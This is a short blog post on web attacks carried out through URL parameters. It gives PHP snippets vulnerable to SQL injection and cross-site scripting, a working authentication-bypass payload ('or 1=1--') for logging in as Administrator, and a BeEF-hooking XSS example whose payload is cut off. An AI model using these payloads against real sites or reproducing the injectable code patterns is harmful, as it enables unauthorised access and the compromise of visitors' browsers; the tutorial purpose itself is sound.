Blog Tips & Tricks

Hacks that work just by changing the URL

Each example has one legit and one malicious example. Some examples require URL encoding to be executed, normally automatically done by your browser.

SQL Injection

code:
$username = $_POST['username'];
$pw = $_GET['password'];
mysql_query("SELECT * FROM userTable WHERE username = $username AND password = $pw");
exploit (logs in as administrator without knowing password):
example.com/?username=Administrator&password=legalPasswordThatShouldBePostInsteadOfGet
example.com/?username=Administrator&password=password' or 1=1--

Cross Site Scripting (XSS)

If you are curious about XSS, see my article ‘Guide in understanding XSS – XSS payloads, attack vectors, BeEF hooking, MiTM with Shank and some history

code:
$nickname= $_GET['nickname'];
echo "Your nickname is $nickname\n";
exploit (registrers visiting user as a zombie in BeEF):
example.com/?nickname=Karrax 
example.com/?nickname=